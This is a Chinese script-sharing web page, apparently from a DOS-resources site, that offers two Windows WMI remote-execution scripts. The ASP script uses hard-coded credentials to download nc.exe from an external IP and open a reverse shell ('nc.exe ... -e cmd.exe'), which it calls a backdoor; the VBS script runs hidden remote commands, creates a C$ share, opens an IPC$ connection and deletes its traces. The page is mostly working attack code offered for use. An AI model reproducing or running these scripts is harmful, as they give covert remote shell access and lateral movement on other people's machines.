减小字体
增大字体- ·上一篇文章:初窥WMI任务WMIC命令利用脚本
- ·下一篇文章:显示进程加载的所有模块(*.dll)详细信息
- ·百度中搜索更多的关于“wmiexec应用脚本”相关内容
- ·谷歌中搜索更多的关于“wmiexec应用脚本”相关内容
- ******申明******
- 本站文章内容有部分为收录网络中其他网友内容,DOS资源站不保证所有的代码都适合你使用。
- 由于编辑匆忙,有可能造成某些脚本文件出现丢失代码或代码无法运行的情况,请网友根据情况自行修改。
- 如果能将出错部分反馈给我,那就更好了。
wmiexec应用脚本
<%
Server.ScriptTimeout=50000
set objlocator=server.createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver("10.0.0.92","root/cimv2","User","xxddsfdf")
Response.write "Creating the blankdoor ..
"
set objinstproc=objswbemservices.get("win32_process")
cmddoor="cmd /c echo Set xPost = CreateObject(^""Microsoft.XMLHTTP^""):xPost.Open ^""GET^"",^""http://222.241.118.227/nc.exe^"",0:xPost.Send():Set sGet = CreateObject(^""ADODB.Stream^""):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^""c:\nc.exe^"",2 >c:\svrer.vbs"
objinstproc.create(cmddoor)
Sleep(1500)
Response.write "
Runing the blankdoor .."
objinstproc.create("cmd /c cscript c:\svrer.vbs")
Sleep(15000)
objinstproc.create("cmd /c c:\nc.exe 222.241.118.227 4321 -e cmd.exe")
Private Sub Sleep(n)
Dim timeNow
timeNow = Now()
While DateDiff("s", timeNow, Now()) < n / 1000: Wend
End Sub
%>
这是一个远程连接.用nc.exe监听.
还有一个VBS脚本
ip = "192.168.0.3"
uid = "administrator"
pwd = "123"
cmd = "ping 163.com"
'连接主机执行命令
cmd1="cmd.exe /c"&cmd& " >c:\temp.txt"
Const HIDDEN_WINDOW = 12
Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objService = objLocator.ConnectServer _
(ip, "root\cimv2", uid, pwd)
Set objStartup = objService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = objService.get("Win32_Process")
errReturn = objProcess.Create(cmd1, null, objConfig, intProcessID)
errReturn = objProcess.Create("net share c$=c:\", null, objConfig, intProcessID)
'建立IPC连接
cmd="net use \\"&ip&"\ipc$ "&pwd&" /user:"&uid
Set objShell = CreateObject("Wscript.Shell")
objShell.Run(cmd),0,true
'读取远程文件
Const ForReading = 1
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile _
("\\192.168.0.3\C$\temp.txt", ForReading)
strContents = objTextFile.ReadAll
objTextFile.Close
'显示运行结果
Wscript.Echo strContents
'删除IPC连接和临时文件
errReturn = objProcess.Create("cmd.exe /c del c:\temp.txt", null, objConfig, intProcessID)
cmd2="net use \\"&ip&"\ipc$ /del"
objShell.Run(cmd2),0,true
